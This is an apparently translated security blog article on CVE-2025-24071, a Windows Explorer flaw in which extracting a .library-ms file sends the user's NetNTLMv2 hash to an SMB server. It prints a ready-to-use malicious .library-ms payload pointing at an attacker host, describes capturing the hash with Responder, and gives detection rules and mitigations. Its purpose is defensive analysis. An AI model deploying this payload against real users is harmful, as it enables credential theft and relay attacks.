In this article, we'll talk about the acclaimed CVE-2025-24071, which allows attackers to obtain NetNTLMv2 hash amounts of passwords as a result of incorrect file processing.library-ms in Windows Explorer. The vulnerability itself is already being exploited in-the-wild, as evidenced by data from cybersecurity researchers. In my short research, I will show you how the vulnerability is exploited, examples of events, and how to detect such activity.
What is.library-ms file
Let's start with what the .library-ms file is. Based on the Microsoft documentation, .library-ms files are XML files that define Windows Libraries (Windows Libraries) - special virtual collections of folders and files presented in the Explorer.
Files with the .library-ms extension are XML files that:
- They store the settings of Windows libraries (for example, "Documents", "Images", "Music").
- They contain links to locations (folders, disks, network resources) combined into one logical group.
- The XML schema described in the Library Schema (MSDN) is used to define the structure and properties of the library.
- They can be created or modified by the user to customize libraries to suit their needs. The main tags in the .library-ms file:
- <library> is the root element that contains a description of the library.
- <name> is the library's display name.
- <version> is the version of the library schema.
- <isLibraryPinned> — indicates whether the library is pinned in the navigation bar.
- <iconReference> is the path to the library icon.
- <TemplateInfo> — defines the type of content (for example, "Documents", "Music").
- <searchConnectorDescription> — contains the search parameters.
- <simpleLocation>/<url> — paths to the included folders.
Example of the structure of a .library-ms file:
XML:
<?xml version="1.0" encoding="UTF-8"?>
<library xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>My Documents</name>
<version>1.0</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1002</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>true</isSupported>
<simpleLocation>
<url>%USERPROFILE%\Documents</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</library>The essence of vulnerability
In fact, two years ago, an article discussed attacks on users using .library-ms files. It described how by specifying the attacker's control server in the <url> tag of the file, remote code execution can be performed by interacting with the attacker's WebDAV share.
On March 18, 2025, researcher 0x6rss revealed details of the vulnerability in his blog, where he described that when unpacking a file from a RAR/ZIP archive, Windows Explorer automatically analyzes them due to trust in .library files. If the <url> tag contains a link to the attacker's SMB ball, then an automatic NTLM authentication attempt occurs with the resulting theft of the victim's NetNTLMv2 account hashes. As noted by the researchers, the vulnerability is also exploited when an email attachment is normally saved to the file system. It was also revealed that authentication on a remote SMB-ball will be necessary for any work with the file.library-ms, including creating, deleting, or moving it around the disk.
An interesting point: for the same .library-ms file, there is no vulnerability during re-unpacking. This is most likely due to the fact that Windows Explorer reads the contents of only new files that are unfamiliar to the system.
Exploiting vulnerability
To generate the file, we will use the PoC from the 0x6rss researcher.
As a result, we get a ZIP archive containing the .library-ms file.
An example of the contents of such a file. First of all, we pay attention to the <url> and <simple Location> tags, which indicate our server accepting NTLM authentication attempts. It is worth noting that the existence of a shared or any other file on a remote resource is not necessary, it is enough to initialize the outgoing SMB connection of the host.:
XML:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.3.132.57\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>The video below shows a replay of the activity — extracting a malicious file from the archive and attempting NetNTLMv2 authentication using the SMB protocol with the managing server.
As shown in the video, to exploit the vulnerability, it is enough for the victim to unzip the archive with the malicious file and the system will do everything on its own.
In the screenshot below, you can see the result of Responder's work, where we managed to obtain the hash amount of the victim's NetNTLMv2 account, which can later be sorted locally or used, for example, in Relay attacks.
Generated events
Using Procmon, it can be observed that Explorer.exe and indexing services such as SearchProtocolHost.exe immediately after extracting the .library-ms file, the following operations are performed automatically:
- CreateFile — the file opens with Explorer.
- ReadFile — the contents of the file are read to extract metadata.
- QueryBasicInformationFile — metadata queries are executed.
- QueryStandardInformationFile — requests for standard file information are performed.
- CloseFile — the file is closed after processing.
In addition, SearchProtocolHost.exe It is called as part of the Windows File indexing service. After Explorer.exe When it completes its initial processing, the indexing service reopens and reads the file to index its contents. This additionally confirms the automatic file processing during extraction.
Further, after processing SearchProtocolHost.exe , you can see the connection to the management server starting.
These actions clearly demonstrate that Windows automatically processes files immediately after extraction, without any explicit user interaction. How Explorer.exe , so and SearchProtocolHost.exe The XML contents of the .library-ms file are automatically read and processed, initiating an attempt to connect to the embedded SMB path.
If we talk about Windows OS events that are generated as a result of activity, then we can distinguish the following:
1. When unpacking a file, we receive a file creation event with the .library-ms extension.
Here I would like to note that the proc_file_path field contains an executable file, as a result of which the contents of the archive were unpacked. Since in our case this is Windows Explorer, we can conclude that if there is no archiver in the victim's system, the process will try to unpack the archive. explorer.exe .
The rule by which such activity can be detected is as follows:
Bash:
dev_os_type:"windows" AND
event_type:(FileCreate OR FileCreateWin OR FileInfo OR FileInfoWin) AND file_name.keyword:/.*\.library-ms2. When interacting directly with the management server, events occur after unpacking the file:
- creating a c process:\windows\system32\rundll32.exe , which in turn calls the DavSetCookie function from the library C:\Windows\system32\davclnt.dll . Documentation on the function could not be found, presumably it is used to set cookies for a WebDAV session. Note that the arguments of this function accept the IP address/domain name of the remote resource, as well as the full path, taking into account the directory.;
- connections (pipecreate) to a named pipe \\.\pipe\dav rpc service with a similar command line.
Bash:
dev_os_type:"windows" AND
(
(
event_type:(ProcessCreate OR ProcessCreateWin OR ProcessInfo OR ProcessInfoWin) AND
proc_file_path:"\\windows\\system32\\rundll32.exe" AND
cmdline:("\\Windows\\system32\\davclnt.dll,DavSetCookie")
) OR
(
event_type:pipeconnect AND
proc_file_path:"\\windows\\system32\\rundll32.exe" AND
proc_cmdline:("\\Windows\\system32\\davclnt.dll,DavSetCookie") AND
pipe_path:"\\\\.\\pipe\\dav rpc service"
)
)Conclusion
In this article, I have demonstrated the essence of the vulnerability CVE-2025-24071, the process of exploitation, events generated during activity, as well as detection suggestions. I would like to note that although, according to Microsoft, the vulnerability will not be popular in public, it can be extremely popular in phishing campaigns due to its wide applicability in the latest operating systems, as well as due to its ease of operation.
Monitoring of the activity described above through the proposed detection rules will help identify attempts to exploit the vulnerability. Other recommendations:
- Limit outgoing SMB connections to external servers to prevent potential attacks.
- As an additional measure, you can also suggest adding the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to the value Deny All (if necessary, you can add exceptions).
- Update the Windows operating system to the latest version, including the March updates, to eliminate known vulnerabilities.
- Prohibit the launch of files with the .library-ms extension, as they can be used to exploit vulnerabilities.
- Block the receipt of files with the .library-ms extension by email to prevent the spread of malicious objects.
